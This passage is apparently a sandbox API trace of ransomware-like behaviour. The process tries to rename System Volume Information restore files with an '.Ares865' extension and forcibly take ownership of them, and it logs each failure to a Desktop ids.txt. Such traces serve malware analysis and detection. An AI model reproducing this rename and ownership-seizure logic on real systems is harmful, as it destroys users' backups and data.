148 [0112.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.561] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x917e [0112.562] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.562] CloseHandle (hObject=0x118) returned 1 [0112.562] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.562] CloseHandle (hObject=0x0) returned 0 [0112.562] CloseHandle (hObject=0x0) returned 0 [0112.562] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xea8e4520, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xea8e4520, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfa616ae0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xcfe8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9625B~3")) returned 1 [0112.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.562] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.563] GetLastError () returned 0x5 [0112.563] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.563] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.563] SetEntriesInAclW () returned 0x0 [0112.563] SetNamedSecurityInfoW () returned 0x5 [0112.563] SetNamedSecurityInfoW () returned 0x5 [0112.563] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.563] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.563] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc52-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.564] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9212 [0112.564] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.564] CloseHandle (hObject=0x118) returned 1 [0112.564] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.564] CloseHandle (hObject=0x0) returned 0 [0112.564] CloseHandle (hObject=0x0) returned 0 [0112.565] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf88a1aa0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xf88a1aa0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xc63a5a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0xd3d8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9625B~4")) returned 1 [0112.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.565] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.565] GetLastError () returned 0x5 [0112.565] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.565] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.565] SetEntriesInAclW () returned 0x0 [0112.565] SetNamedSecurityInfoW () returned 0x5 [0112.565] SetNamedSecurityInfoW () returned 0x5 [0112.565] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.565] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.565] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc56-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.566] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x92a6 [0112.566] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.566] CloseHandle (hObject=0x118) returned 1 [0112.566] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.567] CloseHandle (hObject=0x0) returned 0 [0112.567] CloseHandle (hObject=0x0) returned 0 [0112.567] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xab98f80, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xab98f80, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x19c64860, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0xd6c0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{922CA~1")) returned 1 [0112.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.567] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.567] GetLastError () returned 0x5 [0112.567] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.567] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.567] SetEntriesInAclW () returned 0x0 [0112.567] SetNamedSecurityInfoW () returned 0x5 [0112.567] SetNamedSecurityInfoW () returned 0x5 [0112.567] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.567] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.567] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc5a-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.568] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x933a [0112.568] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.569] CloseHandle (hObject=0x118) returned 1 [0112.569] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.569] CloseHandle (hObject=0x0) returned 0 [0112.569] CloseHandle (hObject=0x0) returned 0 [0112.569] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x18020320, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x18020320, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x28c0d100, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0xd8a4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{96E5E~1")) returned 1 [0112.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.569] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.569] GetLastError () returned 0x5 [0112.569] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.569] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.569] SetEntriesInAclW () returned 0x0 [0112.569] SetNamedSecurityInfoW () returned 0x5 [0112.569] SetNamedSecurityInfoW () returned 0x5 [0112.570] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.570] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.570] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc5e-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.570] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x93ce [0112.570] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.571] CloseHandle (hObject=0x118) returned 1 [0112.571] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.571] CloseHandle (hObject=0x0) returned 0 [0112.571] CloseHandle (hObject=0x0) returned 0 [0112.571] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x27014e80, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x27014e80, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x328dba40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x2d64000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{98BB1~1")) returned 1 [0112.571] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.571] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.571] GetLastError () returned 0x5 [0112.571] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.571] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.571] SetEntriesInAclW () returned 0x0 [0112.571] SetNamedSecurityInfoW () returned 0x5 [0112.571] SetNamedSecurityInfoW () returned 0x5 [0112.572] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.572] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.572] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc62-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.572] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9462 [0112.572] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.573] CloseHandle (hObject=0x118) returned 1 [0112.573] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.573] CloseHandle (hObject=0x0) returned 0 [0112.573] CloseHandle (hObject=0x0) returned 0 [0112.573] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x300b0700, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x300b0700, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x4321af60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0xd8a4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}", cAlternateFileName="{9C755~1")) returned 1 [0112.573] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865") returned 113 [0112.573] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}" (normalized: "c:\\system volume information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}"), lpNewFileName="C:\\System Volume Information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.Ares865" (normalized: "c:\\system volume information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752}.ares865"), dwFlags=0x1) returned 0 [0112.573] GetLastError () returned 0x5 [0112.573] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd148, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd158 | out: pSid=0x2ccd158*=0x2cb658*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0112.573] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ccd140, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ccd164 | out: pSid=0x2ccd164*=0x2cb610*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.573] SetEntriesInAclW () returned 0x0 [0112.573] SetNamedSecurityInfoW () returned 0x5 [0112.574] SetNamedSecurityInfoW () returned 0x5 [0112.574] LocalFree (hMem=0x2ccee8) returned 0x0 [0112.574] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx TakeOwnership error %i\r\n" | out: param_1="[ERROR] C:\\System Volume Information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.574] lstrlenA (lpString="[ERROR] C:\\System Volume Information\\{9625bc66-5213-11e7-bb6d-c43dc7584a00}{3808876b-c176-4e48-b7ae-04046e6cc752} MoveFileEx TakeOwnership error 5\r\n") returned 148 [0112.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0112.574] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x94f6 [0112.574] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x94, lpOverlapped=0x0) returned 1 [0112.575] CloseHandle (hObject=0x118) returned 1 [0112.575] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0112.575] CloseHandle (hObject=0x0) returned 0 [0112.575] CloseHandle 